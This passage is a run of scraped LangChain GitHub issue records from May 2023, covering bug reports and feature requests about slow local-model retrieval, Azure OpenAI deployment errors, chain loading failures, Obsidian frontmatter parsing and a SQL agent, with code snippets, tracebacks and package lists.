qa = RetrievalQA.from_chain_type(llm=llm, chain_type="stuff", retriever=docsearch.as_retriever())
query = "How did the pandemic affect businesses"
ans = qa.run(query)
```
For some reason, running the chain on a query takes an extremely long time (>25 minutes).
Is this due to hardware limitations or something else? I'm able to run queries directly against the GPT4All model I downloaded locally fairly quickly (like the example shown [here](https://docs.gpt4all.io/gpt4all_python.html)), which is why I'm unclear on what's causing this massive runtime.
Hardware: M1 Mac, macOS 12.1, 8 GB RAM, Python 3.10.11
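One mitigation I plan to try (an assumption on my part, not a confirmed fix) is shrinking the prompt the chain builds, since CPU inference time grows with prompt length:

```python
retriever = docsearch.as_retriever(search_kwargs={"k": 1})  # fewer retrieved chunks -> shorter prompt
qa = RetrievalQA.from_chain_type(llm=llm, chain_type="stuff", retriever=retriever)
```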
### Suggestion:
_No response_ | Issue: Very long runtimes for RetrievalQA chain with GPT4All | https://api.github.com/repos/langchain-ai/langchain/issues/5016/comments | 8 | 2023-05-20T03:57:58Z | 2024-01-06T03:53:34Z | https://github.com/langchain-ai/langchain/issues/5016 | 1,718,038,199 | 5,016 |
[
"hwchase17",
"langchain"
]
| ### Feature request
None of the search tools have async support.
### Motivation
Async calls are used in a LangChain setup with FastAPI. Not having async support for these tools blocks their use.
### Your contribution
Happy to help out where needed. | Async Support | Search Tools | https://api.github.com/repos/langchain-ai/langchain/issues/5011/comments | 9 | 2023-05-20T01:37:04Z | 2024-06-01T00:07:30Z | https://github.com/langchain-ai/langchain/issues/5011 | 1,717,978,496 | 5,011 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I have been playing around with the Plan & Execute Agent.
Would love to see async support implemented.
### Motivation
Would like to use it as a drop-in agent replacement for my existing async setup.
### Your contribution
Happy to help out where needed. | Async Support | Plan & Execute | https://api.github.com/repos/langchain-ai/langchain/issues/5010/comments | 2 | 2023-05-20T01:34:11Z | 2023-09-12T16:14:29Z | https://github.com/langchain-ai/langchain/issues/5010 | 1,717,977,580 | 5,010 |
[
"hwchase17",
"langchain"
]
| ### System Info
Broken by #4915
Error: `Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.embedding.Embedding'>`
I'm putting a PR out to fix this now.
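In the meantime, a possible workaround (assuming the `deployment` field still routes the request correctly) is to set the deployment explicitly:

```python
from langchain.embeddings import OpenAIEmbeddings

embeddings = OpenAIEmbeddings(
    deployment="text-embedding-ada-002",  # assumption: the name of your Azure deployment
    chunk_size=1,
)
```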
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run example notebook: https://github.com/hwchase17/langchain/blob/22d844dc0795e7e53a4cc499bf4974cb83df490d/docs/modules/models/text_embedding/examples/azureopenai.ipynb
### Expected behavior
Embedding using Azure OpenAI should work. | Azure OpenAI Embeddings failed due to no deployment_id set. | https://api.github.com/repos/langchain-ai/langchain/issues/5001/comments | 2 | 2023-05-19T20:18:47Z | 2023-05-22T06:43:51Z | https://github.com/langchain-ai/langchain/issues/5001 | 1,717,774,987 | 5,001 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.169
openai==0.27.6
### Who can help?
@hwchase17
@agola11
@vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
import os

from dotenv import load_dotenv
from langchain.chat_models import ChatOpenAI
from langchain.embeddings import OpenAIEmbeddings

load_dotenv('.env')
ChatOpenAI(temperature=0, max_tokens=500, model_name='gpt-3.5-turbo', openai_api_base=os.environ['OPENAI_API_BASE']).call_as_llm('Hi')
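For comparison, the Azure-specific wrapper does let you name a deployment explicitly (a sketch; the deployment name and API version below are assumptions you would replace with your own):

```python
from langchain.chat_models import AzureChatOpenAI

chat = AzureChatOpenAI(
    deployment_name="gpt-35-turbo",           # assumption: your Azure deployment name
    openai_api_version="2023-03-15-preview",  # assumption: the API version of your resource
)
chat.call_as_llm('Hi')
```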
### Expected behavior
[nltk_data] Downloading package stopwords to /home/sahand/nltk_data...
[nltk_data] Package stopwords is already up-to-date!
[nltk_data] Downloading package punkt to /home/sahand/nltk_data...
[nltk_data] Package punkt is already up-to-date!
Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.chat_completion.ChatCompletion'>
Invalid API key.
| ChatOpenAI: Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.chat_completion.ChatCompletion'> | https://api.github.com/repos/langchain-ai/langchain/issues/5000/comments | 19 | 2023-05-19T20:17:41Z | 2024-02-09T16:10:57Z | https://github.com/langchain-ai/langchain/issues/5000 | 1,717,773,530 | 5,000 |
[
"hwchase17",
"langchain"
]
| ### System Info
I tried using the `code-davinci-002` model with LangChain; it looks like it is not supported in the LLM wrapper.
```openai.error.InvalidRequestError: The model: `code-davinci-001` does not exist```
<img width="619" alt="image" src="https://github.com/hwchase17/langchain/assets/41926176/4b8bb7a7-ad4c-4618-a5f9-a8bc2a25705e">
### Who can help?
@hwchase17
@agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.llms import OpenAI
llm = OpenAI(model_name='code-davinci-002')
llm('write python code to create json object in s3')
```
### Expected behavior
The expected behaviour is that the model should load as an LLM object | code-davinci-002 does not work with LangChain | https://api.github.com/repos/langchain-ai/langchain/issues/4999/comments | 6 | 2023-05-19T20:17:35Z | 2024-01-11T12:31:46Z | https://github.com/langchain-ai/langchain/issues/4999 | 1,717,773,452 | 4,999 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
from langchain.agents.agent_toolkits.openapi import planner
from langchain.llms import PromptLayerOpenAI
llm = PromptLayerOpenAI(model_name="gpt-4", temperature=0.25)
content_agent = planner.create_openapi_agent(api_spec=content_api_spec, requests_wrapper=Requests(headers = {"Authorization": f"Bearer {token}"}), llm=llm)
```
Expected that API requests are logged.
However, nothing is actually logged.
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
See code
### Expected behavior
Expected that API requests are logged on promptlayer.com.
However, nothing is actually logged. | PromptLayerOpenAI doesn't work with planner | https://api.github.com/repos/langchain-ai/langchain/issues/4995/comments | 1 | 2023-05-19T18:56:35Z | 2023-09-10T16:15:07Z | https://github.com/langchain-ai/langchain/issues/4995 | 1,717,682,308 | 4,995 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python 3, Google Colab/Mac-OS Conda Env, Langchain v0.0.173, Dev2049/obsidian patch #4204
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
See Colab: https://colab.research.google.com/drive/1YSfKTQ92RZEJ-z-hlwHL7f5rQ-evTgx4?usp=sharing
1. Have Obsidian Files with Front_Matter other then simple key_values
2. Import ObsidianLoader and create loader with the Obsidian Vault
3. load documents
YAML frontmatter is parsed to:
metadata={'source': 'Demo-Note.md', 'path': 'Obsidian_Vault/Demo-Note.md', 'created': 1684513990.4561925, 'last_modified': 1684513964.4224126, 'last_accessed': 1684514007.4610083, 'normal': 'frontmatter is just key-value based', 'list_frontmatter': '', 'dictionary_frontmatter': '', 'can': 'contain', 'different': 'key-value-pairs', 'and': '[even, nest, these, types]'}
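A loader that parsed the front matter with PyYAML would recover the nested structures; a minimal sketch (assuming the `yaml` package is available):

```python
import yaml

def parse_front_matter(text: str) -> dict:
    # Front matter sits between the first two '---' delimiter lines.
    if not text.startswith("---"):
        return {}
    _, front_matter, _ = text.split("---", 2)
    return yaml.safe_load(front_matter) or {}
```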
### Expected behavior
YAML Frontmatter should be parsed according to YAML rules
---
normal: frontmatter is just key-value based
list_frontmatter:
- can
- be
- an array
dictionary_frontmatter:
can: contain
different: key-value-pairs
and: [even, nest, these, types]
---
-->
```
{
    'normal': 'frontmatter is just key-value based',
    'list_frontmatter': ['can', 'be', 'an array'],
    'dictionary_frontmatter': {
        'can': 'contain',
        'different': 'key-value-pairs',
        'and': ['even', 'nest', 'these', 'types']
    }
}
``` | ObsidianLoader doesn't Parse Frontmatter of Obsidian Files according to YAML, but line-by-line and only for key-value pairs | https://api.github.com/repos/langchain-ai/langchain/issues/4991/comments | 1 | 2023-05-19T16:45:59Z | 2023-09-10T16:15:11Z | https://github.com/langchain-ai/langchain/issues/4991 | 1,717,534,417 | 4,991 |
[
"hwchase17",
"langchain"
]
| ### System Info
aiohttp==3.8.4
aiosignal==1.3.1
altair==4.2.2
anyio @ file:///C:/ci_311/anyio_1676425491996/work/dist
argilla==1.6.0
argon2-cffi @ file:///opt/conda/conda-bld/argon2-cffi_1645000214183/work
argon2-cffi-bindings @ file:///C:/ci_311/argon2-cffi-bindings_1676424443321/work
asttokens @ file:///opt/conda/conda-bld/asttokens_1646925590279/work
async-timeout==4.0.2
attrs @ file:///C:/ci_311/attrs_1676422272484/work
Babel @ file:///C:/ci_311/babel_1676427169844/work
backcall @ file:///home/ktietz/src/ci/backcall_1611930011877/work
backoff==2.2.1
beautifulsoup4 @ file:///C:/b/abs_0agyz1wsr4/croot/beautifulsoup4-split_1681493048687/work
bleach @ file:///opt/conda/conda-bld/bleach_1641577558959/work
blinker==1.6.2
brotlipy==0.7.0
cachetools==5.3.0
certifi @ file:///C:/b/abs_4a0polqwty/croot/certifi_1683875377622/work/certifi
cffi @ file:///C:/ci_311/cffi_1676423759166/work
chardet==5.1.0
charset-normalizer @ file:///tmp/build/80754af9/charset-normalizer_1630003229654/work
chromadb==0.3.21
click==8.1.3
clickhouse-connect==0.5.22
colorama @ file:///C:/ci_311/colorama_1676422310965/work
comm @ file:///C:/ci_311/comm_1678376562840/work
commonmark==0.9.1
cryptography @ file:///C:/ci_311/cryptography_1679419210767/work
Cython==0.29.34
dataclasses-json==0.5.7
debugpy @ file:///C:/ci_311/debugpy_1676426137692/work
decorator @ file:///opt/conda/conda-bld/decorator_1643638310831/work
defusedxml @ file:///tmp/build/80754af9/defusedxml_1615228127516/work
Deprecated==1.2.13
duckdb==0.7.1
entrypoints @ file:///C:/ci_311/entrypoints_1676423328987/work
et-xmlfile==1.1.0
executing @ file:///opt/conda/conda-bld/executing_1646925071911/work
fastapi==0.95.1
fastjsonschema @ file:///C:/ci_311/python-fastjsonschema_1679500568724/work
filelock==3.12.0
frozenlist==1.3.3
fsspec==2023.4.0
ftfy==6.1.1
gitdb==4.0.10
GitPython==3.1.31
google-api-core==2.11.0
google-api-python-client==2.86.0
google-auth==2.18.0
google-auth-httplib2==0.1.0
googleapis-common-protos==1.59.0
greenlet==2.0.2
h11==0.14.0
hnswlib @ file:///D:/bld/hnswlib_1675802891722/work
httpcore==0.16.3
httplib2==0.22.0
httptools==0.5.0
httpx==0.23.3
huggingface-hub==0.14.1
idna @ file:///C:/ci_311/idna_1676424932545/work
importlib-metadata==6.6.0
ipykernel @ file:///C:/ci_311/ipykernel_1678734799670/work
ipython @ file:///C:/b/abs_d1yx5tjhli/croot/ipython_1680701887259/work
ipython-genutils @ file:///tmp/build/80754af9/ipython_genutils_1606773439826/work
ipywidgets @ file:///C:/b/abs_5awapknmz_/croot/ipywidgets_1679394824767/work
jedi @ file:///C:/ci_311/jedi_1679427407646/work
Jinja2 @ file:///C:/ci_311/jinja2_1676424968965/work
joblib==1.2.0
json5 @ file:///tmp/build/80754af9/json5_1624432770122/work
jsonschema @ file:///C:/b/abs_d40z05b6r1/croot/jsonschema_1678983446576/work
jupyter @ file:///C:/ci_311/jupyter_1678249952587/work
jupyter-console @ file:///C:/b/abs_82xaa6i2y4/croot/jupyter_console_1680000189372/work
jupyter-server @ file:///C:/ci_311/jupyter_server_1678228762759/work
jupyter_client @ file:///C:/b/abs_059idvdagk/croot/jupyter_client_1680171872444/work
jupyter_core @ file:///C:/b/abs_9d0ttho3bs/croot/jupyter_core_1679906581955/work
jupyterlab @ file:///C:/ci_311/jupyterlab_1677719392688/work
jupyterlab-pygments @ file:///tmp/build/80754af9/jupyterlab_pygments_1601490720602/work
jupyterlab-widgets @ file:///C:/b/abs_38ad427jkz/croot/jupyterlab_widgets_1679055289211/work
jupyterlab_server @ file:///C:/b/abs_e0qqsihjvl/croot/jupyterlab_server_1680792526136/work
langchain==0.0.157
lxml @ file:///C:/b/abs_c2bg6ck92l/croot/lxml_1679646459966/work
lz4==4.3.2
Markdown==3.4.3
MarkupSafe @ file:///C:/ci_311/markupsafe_1676424152318/work
marshmallow==3.19.0
marshmallow-enum==1.5.1
matplotlib-inline @ file:///C:/ci_311/matplotlib-inline_1676425798036/work
mistune @ file:///C:/ci_311/mistune_1676425149302/work
monotonic==1.6
mpmath==1.3.0
msg-parser==1.2.0
multidict==6.0.4
mypy-extensions==1.0.0
nbclassic @ file:///C:/b/abs_c8_rs7b3zw/croot/nbclassic_1681756186106/work
nbclient @ file:///C:/ci_311/nbclient_1676425195918/work
nbconvert @ file:///C:/ci_311/nbconvert_1676425836196/work
nbformat @ file:///C:/ci_311/nbformat_1676424215945/work
nest-asyncio @ file:///C:/ci_311/nest-asyncio_1676423519896/work
networkx==3.1
nltk==3.8.1
notebook @ file:///C:/b/abs_49d8mc_lpe/croot/notebook_1681756182078/work
notebook_shim @ file:///C:/ci_311/notebook-shim_1678144850856/work
numexpr==2.8.4
numpy==1.23.5
olefile==0.46
openai==0.27.6
openapi-schema-pydantic==1.2.4
openpyxl==3.1.2
packaging @ file:///C:/b/abs_ed_kb9w6g4/croot/packaging_1678965418855/work
pandas==1.5.3
pandocfilters @ file:///opt/conda/conda-bld/pandocfilters_1643405455980/work
parso @ file:///opt/conda/conda-bld/parso_1641458642106/work
pdfminer.six==20221105
pickleshare @ file:///tmp/build/80754af9/pickleshare_1606932040724/work
Pillow==9.5.0
platformdirs @ file:///C:/ci_311/platformdirs_1676422658103/work
ply==3.11
posthog==3.0.1
prometheus-client @ file:///C:/ci_311/prometheus_client_1679591942558/work
prompt-toolkit @ file:///C:/ci_311/prompt-toolkit_1676425940920/work
protobuf==3.20.3
psutil @ file:///C:/ci_311_rebuilds/psutil_1679005906571/work
pure-eval @ file:///opt/conda/conda-bld/pure_eval_1646925070566/work
pyarrow==11.0.0
pyasn1==0.5.0
pyasn1-modules==0.3.0
pycparser @ file:///tmp/build/80754af9/pycparser_1636541352034/work
pydantic==1.10.7
pydeck==0.8.1b0
Pygments @ file:///opt/conda/conda-bld/pygments_1644249106324/work
Pympler==1.0.1
pyOpenSSL @ file:///C:/b/abs_de215ipd18/croot/pyopenssl_1678965319166/work
pypandoc==1.11
pyparsing==3.0.9
PyQt5==5.15.7
PyQt5-sip @ file:///C:/ci_311/pyqt-split_1676428895938/work/pyqt_sip
pyrsistent @ file:///C:/ci_311/pyrsistent_1676422695500/work
PySocks @ file:///C:/ci_311/pysocks_1676425991111/work
python-dateutil @ file:///tmp/build/80754af9/python-dateutil_1626374649649/work
python-docx==0.8.11
python-dotenv==1.0.0
python-magic==0.4.27
python-pptx==0.6.21
pytz @ file:///C:/ci_311/pytz_1676427070848/work
pytz-deprecation-shim==0.1.0.post0
pywin32==305.1
pywinpty @ file:///C:/ci_311/pywinpty_1677707791185/work/target/wheels/pywinpty-2.0.10-cp311-none-win_amd64.whl
PyYAML==6.0
pyzmq @ file:///C:/b/abs_8b16zbmf46/croot/pyzmq_1682697651374/work
qtconsole @ file:///C:/b/abs_eb4u9jg07y/croot/qtconsole_1681402843494/work
QtPy @ file:///C:/ci_311/qtpy_1676432558504/work
regex==2023.3.23
requests @ file:///C:/b/abs_41owkd5ymz/croot/requests_1682607524657/work
rfc3986==1.5.0
rich==13.0.1
rsa==4.9
scikit-learn==1.2.2
scipy==1.10.1
Send2Trash @ file:///tmp/build/80754af9/send2trash_1632406701022/work
sentence-transformers==2.2.2
sentencepiece==0.1.99
sip @ file:///C:/ci_311/sip_1676427825172/work
six @ file:///tmp/build/80754af9/six_1644875935023/work
smmap==5.0.0
sniffio @ file:///C:/ci_311/sniffio_1676425339093/work
soupsieve @ file:///C:/b/abs_a989exj3q6/croot/soupsieve_1680518492466/work
SQLAlchemy==2.0.12
stack-data @ file:///opt/conda/conda-bld/stack_data_1646927590127/work
starlette==0.26.1
streamlit==1.22.0
sympy==1.11.1
tenacity==8.2.2
terminado @ file:///C:/ci_311/terminado_1678228513830/work
threadpoolctl==3.1.0
tiktoken==0.3.3
tinycss2 @ file:///C:/ci_311/tinycss2_1676425376744/work
tokenizers==0.13.3
toml @ file:///tmp/build/80754af9/toml_1616166611790/work
tomli @ file:///C:/ci_311/tomli_1676422027483/work
toolz==0.12.0
torch==2.0.0
torchvision==0.15.1
tornado @ file:///C:/ci_311/tornado_1676423689414/work
tqdm==4.65.0
traitlets @ file:///C:/ci_311/traitlets_1676423290727/work
transformers==4.28.1
typing-inspect==0.8.0
typing_extensions @ file:///C:/b/abs_a1bb332wcs/croot/typing_extensions_1681939523095/work
tzdata==2023.3
tzlocal==4.3
unstructured==0.6.2
uritemplate==4.1.1
urllib3 @ file:///C:/b/abs_3ce53vrdcr/croot/urllib3_1680254693505/work
uvicorn==0.22.0
validators==0.20.0
watchdog==3.0.0
watchfiles==0.19.0
wcwidth @ file:///Users/ktietz/demo/mc3/conda-bld/wcwidth_1629357192024/work
webencodings==0.5.1
websocket-client @ file:///C:/ci_311/websocket-client_1676426063281/work
websockets==11.0.2
widgetsnbextension @ file:///C:/b/abs_882k4_4kdf/croot/widgetsnbextension_1679313880295/work
wikipedia==1.4.0
win-inet-pton @ file:///C:/ci_311/win_inet_pton_1676425458225/work
wrapt==1.14.1
XlsxWriter==3.1.0
yarl==1.9.2
zipp==3.15.0
zstandard==0.21.0
### Who can help?
@vowelparrot
I have created a toolkit from chroma documents. I have also created a custom tool.
I want to create a vectorstoreinfo from my custom tool so I can use this tool in vectorstoreagent.
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.agents.agent_toolkits import (
create_vectorstore_agent,
VectorStoreToolkit,
VectorStoreInfo,
)
vectorstore_info = VectorStoreInfo(
name=" tax queries",
description="tax related documents",
vectorstore=db_store
)
toolkit = VectorStoreToolkit(vectorstore_info=vectorstore_info)
agent_executor = create_vectorstore_agent(
llm=llm,
toolkit=toolkit,
verbose=True
)
```
### Expected behavior
I have created a custom tool
```
def evaluate_expression(expression):
    ans = expression  # placeholder logic
    return ans

tool = Tool(
    name="Expression Evaluator",
    func=evaluate_expression,
    description="useful for when you need to output an expression."
)
```
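For context, this is the kind of combination I am after (a sketch; whether `initialize_agent` is the right way to mix the toolkit's tools with a custom tool is exactly what I am asking):

```python
from langchain.agents import AgentType, initialize_agent

# assumption: toolkit.get_tools() returns the vectorstore tools built above
tools = toolkit.get_tools() + [tool]
agent = initialize_agent(
    tools,
    llm,
    agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION,
    verbose=True,
)
```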
Please advise: how can I create a VectorStoreInfo using this tool and add it to a toolkit, so I can use this tool in the vectorstore agent? | How to create a vectorstoreinfo using a custom tool. | https://api.github.com/repos/langchain-ai/langchain/issues/4980/comments | 3 | 2023-05-19T12:11:25Z | 2023-09-15T16:12:26Z | https://github.com/langchain-ai/langchain/issues/4980 | 1,717,149,421 | 4,980 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.173
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.llms import OpenAI
from langchain.evaluation.qa import QAGenerateChain
from langchain.chains.loading import load_chain
example_gen_chain = QAGenerateChain.from_llm(OpenAI())
example_gen_chain.save("/Users/liang.zhang/qa_gen_chain.yaml")
loaded_chain = load_chain("/Users/liang.zhang/qa_gen_chain.yaml")
```
Error:
```
---------------------------------------------------------------------------
ValidationError Traceback (most recent call last)
Input In [13], in <cell line: 2>()
1 from langchain.chains.loading import load_chain
----> 2 loaded_chain = load_chain("/Users/liang.zhang/qa_gen_chain.yaml")
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/chains/loading.py:449, in load_chain(path, **kwargs)
447 return hub_result
448 else:
--> 449 return _load_chain_from_file(path, **kwargs)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/chains/loading.py:476, in _load_chain_from_file(file, **kwargs)
473 config["memory"] = kwargs.pop("memory")
475 # Load the chain from the config now.
--> 476 return load_chain_from_config(config, **kwargs)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/chains/loading.py:439, in load_chain_from_config(config, **kwargs)
436 raise ValueError(f"Loading {config_type} chain not supported")
438 chain_loader = type_to_loader_dict[config_type]
--> 439 return chain_loader(config, **kwargs)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/chains/loading.py:44, in _load_llm_chain(config, **kwargs)
42 if "prompt" in config:
43 prompt_config = config.pop("prompt")
---> 44 prompt = load_prompt_from_config(prompt_config)
45 elif "prompt_path" in config:
46 prompt = load_prompt(config.pop("prompt_path"))
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/prompts/loading.py:30, in load_prompt_from_config(config)
27 raise ValueError(f"Loading {config_type} prompt not supported")
29 prompt_loader = type_to_loader_dict[config_type]
---> 30 return prompt_loader(config)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/langchain/prompts/loading.py:115, in _load_prompt(config)
113 config = _load_template("template", config)
114 config = _load_output_parser(config)
--> 115 return PromptTemplate(**config)
File ~/miniforge3/envs/mlflow-3.8/lib/python3.8/site-packages/pydantic/main.py:342, in pydantic.main.BaseModel.__init__()
ValidationError: 1 validation error for PromptTemplate
output_parser
Can't instantiate abstract class BaseOutputParser with abstract methods parse (type=type_error)
```
### Expected behavior
No errors should occur. | QAGenerateChain cannot be loaded | https://api.github.com/repos/langchain-ai/langchain/issues/4977/comments | 2 | 2023-05-19T11:38:43Z | 2023-05-21T22:56:09Z | https://github.com/langchain-ai/langchain/issues/4977 | 1,717,108,430 | 4,977 |
[
"hwchase17",
"langchain"
]
| ### Feature request
https://arxiv.org/pdf/2305.10601.pdf
### Motivation
Language models are increasingly being deployed for general problem-solving across a wide range of tasks, but are still confined to token-level, left-to-right decision-making processes during inference. This means they can fall short in tasks that require exploration, strategic lookahead, or where initial decisions play a pivotal role. To surmount these challenges, there is a new framework for language model inference, “Tree of Thoughts” (ToT), which generalizes over the popular “Chain of Thought” approach to prompting language models and enables exploration over coherent units of text (“thoughts”) that serve as intermediate steps toward problem-solving. ToT allows LMs to perform deliberate decision-making by considering multiple different reasoning paths and self-evaluating choices to decide the next course of action, as well as looking ahead or backtracking when necessary to make global choices.
### Your contribution
maybe, not sure😥 | consider introduce ToT approch in langchain🐱🐱 | https://api.github.com/repos/langchain-ai/langchain/issues/4975/comments | 23 | 2023-05-19T10:50:30Z | 2023-08-17T20:58:11Z | https://github.com/langchain-ai/langchain/issues/4975 | 1,717,046,200 | 4,975 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi!
Can you change the openapi-schema-pydantic dependency? It depends on a pydantic version with a known vulnerability (CVE-2021-29510), so I can't install new versions of langchain because they don't pass the security check on my PC.
https://github.com/kuimono/openapi-schema-pydantic/issues/31
https://nvd.nist.gov/vuln/detail/CVE-2021-29510
### Suggestion:
Remove openapi-schema-pydantic from dependency?! | Issue: openapi-schema-pydantic vulnerability | https://api.github.com/repos/langchain-ai/langchain/issues/4974/comments | 3 | 2023-05-19T10:39:37Z | 2024-03-13T16:12:28Z | https://github.com/langchain-ai/langchain/issues/4974 | 1,717,032,053 | 4,974 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.173
Platform: Ubuntu 22.04.2 LTS
Python: 3.10.6
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Firstly, you can reproduce the errors using the following Jupyter notebook, assuming you have all the dependencies set up:
https://github.com/limcheekin/langchain-playground/blob/main/supabase.ipynb
When running the following code:
```
retriever = vector_store.as_retriever(search_type="mmr", search_kwargs={"k": 1})
docs = retriever.get_relevant_documents("What is Flutter?")
```
It returns the following error; you can see the complete error trace at cell 6 of the notebook above:
```
ValueError: Number of columns in X and Y must be the same. X has shape (1, 768) and Y has shape (20, 0).
```
### Expected behavior
It should return 1 doc, similar to the documentation at https://python.langchain.com/en/latest/modules/indexes/vectorstores/examples/supabase.html#maximal-marginal-relevance-searches | SupabaseVectorStore ValueError in .as_retriever(search_type="mmr").get_relevant_documents() | https://api.github.com/repos/langchain-ai/langchain/issues/4972/comments | 1 | 2023-05-19T08:38:01Z | 2023-05-19T09:03:00Z | https://github.com/langchain-ai/langchain/issues/4972 | 1,716,866,155 | 4,972 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi guys,
New to github and my first post here.
Been testing out LLM + Langchain SQL agent and it's really cool.
However, I'm running into this issue constantly.
Say there are 3 continent values in my SQL data: the US, Asia, and Europe.
When I ask about 2 of them it works, but Asia kept giving me:
"The table does not have a column called "continent"
This is also right after it pulls the schema via: "Action: schema_sql_db".
You can clearly see the column name and it works for the other 2 but not this one.
Is there something I'm not getting?
Thanks.
### Suggestion:
_No response_ | Issue: The table does not have a column called $ when there clearly is. | https://api.github.com/repos/langchain-ai/langchain/issues/4968/comments | 1 | 2023-05-19T06:21:01Z | 2023-09-10T16:15:21Z | https://github.com/langchain-ai/langchain/issues/4968 | 1,716,692,511 | 4,968 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I'm trying to query from my knowledge base in csv by creating embeddings.
I was able to do it with OpenAI LLM model. But when I'm trying with AzureOpenAI model, I'm getting an error.
I've checked the LLM object for both OpenAI modela and AzureOpenAI model, attributes are all same, but I'm getting below error.
I'm using text-embeddings-ada-002 for creating embeddings and text-davinci-003 for LLM model.
It would be great if someone could give me some leads. Thanks in advance.
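For reference, my current guess (an assumption I would like confirmed) is that the completion call needs the Azure deployment name on the LLM as well:

```python
from langchain.llms import AzureOpenAI

llm = AzureOpenAI(
    deployment_name="text-davinci-003",  # assumption: the name of your Azure deployment
    model_name="text-davinci-003",
)
```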
Error:
Traceback (most recent call last):
File "C:\Users\akshay\Documents\GPT\azureLlmGPT.py", line 64, in <module>
print(model.run(question))
^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 213, in run
return self(args[0])[self.output_keys[0]]
^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 116, in __call__
raise e
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 113, in __call__
outputs = self._call(inputs)
^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\retrieval_qa\base.py", line 110, in _call
answer = self.combine_documents_chain.run(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\akshay\AppData\Local\Programs\Python\Python311\Lib\site-packages\langchain\chains\base.py", line 216, in run
